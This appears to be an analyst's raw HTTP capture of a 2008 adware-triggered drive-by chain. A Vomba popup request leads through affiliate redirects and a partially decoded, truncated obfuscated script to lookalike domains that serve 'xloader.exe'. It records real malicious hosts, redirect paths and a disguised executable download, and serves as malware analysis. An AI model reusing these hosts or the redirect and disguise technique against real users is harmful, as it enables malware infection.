POST /vomba/popup.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Vomba
Host: services.vombanetwork.com
Content-Length: 366
Cache-Control: no-cache
Cookie: __utma=...
hwd=...&ac=202&sac=1000&ver=1020001&pop=8&time=...&his=uid:...|--&keyword=www.gevalia.com|image|home|gevalia.com|gevalia%20com|gevalia|&trigger_domain=www.gevalia.com&trigger_url=%2FGevalia%2Fimages%2Fcommon%2Fdot_clear.gif%3F%26mid%3Db4fZXZnQ%26ptid%3DHOME
HTTP/1.1 200 OK
Date: Sat, 11 Oct 2008 06:32:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: CP="NON NID PSAa PSDa OUR IND NAV"
Set-Cookie: ...
Content-Length: 1303
Content-Type: text/html; charset=UTF-8
1
1
1
1
0
1
0
1
550
750
0
0
http%3A%2F%2Fwww.doubleyourctr.com%2Fgevalia.htm
0
...
...
iadv10178
http://mediatraffic.com
...
Mon, 10-Nov-2008 5:32:50 GMT
0
3
-1
-1
-1
-1
NORS
GET /gevalia.htm HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: www.doubleyourctr.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 11 Oct 2008 06:32:50 GMT
Server: Apache
Last-Modified: Sun, 21 Sep 2008 16:21:44 GMT
ETag: "3dc208-4ed9-48d67498"
Accept-Ranges: bytes
Content-Length: 20185
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Please wait..
GET /afclick.php?o=3882&b=x2mhm0x0&p=9136&l=1&s=tm HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: www.lynxtrack.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 11 Oct 2008 06:32:56 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOR DSP COR ADM OUR"
Set-Cookie: afclick_3882=1223706776%2B3882%2B9136%2Btm%2Bx2mhm0x0%2B9f2b09a0-e8ae-102b-9f5a-001372fd42f8%2B1%2B0; expires=Sat, 11-Oct-2008 08:32:56 GMT; path=/; domain=.lynxtrack.com
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
If this page does not load please click here.
--> decoding and partially reformatting a portion of the encoded javascript found above
function zhjI(fuJ){
function wXul(eIfHsa){
var tmDC=0;
var ilpI=eIfHsa.length;
var iHUzIn=0;
while(iHUzInggx.length)yhqI=0;
if(zifvHGv>zsQzva.length)zifv%
...
GET /bizhost.cn/ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.doubleyourctr.com/gevalia.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: www.doubleyourctr.com.2d6a235d6093b2a6.axa3.cn
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: nginx/0.6.31
Date: Sat, 11 Oct 2008 14:26:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Location: http://www.google.com.br.updatesoftware.index.d81f0f02cd6a877358cde8fbdbad89a5.qwertycn.cn/myspace.cn/index.php
Content-Length: 0
GET /myspace.cn/index.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.doubleyourctr.com/gevalia.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: Keep-Alive
Host: www.google.com.br.updatesoftware.index.d81f0f02cd6a877358cde8fbdbad89a5.qwertycn.cn
HTTP/1.1 200 OK
Server: nginx/0.6.31
Date: Sat, 11 Oct 2008 14:26:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Content-Length: 1155
GET /myspace.cn/load.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: www.google.com.br.updatesoftware.index.d81f0f02cd6a877358cde8fbdbad89a5.qwertycn.cn
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.6.31
Date: Sat, 11 Oct 2008 14:26:11 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Accept-Ranges: bytes
Content-Length: 13312
Content-Disposition: inline; filename=xloader.exe
MZ..................@.......................................... !.L!This program cannot be run in DOS mode.
...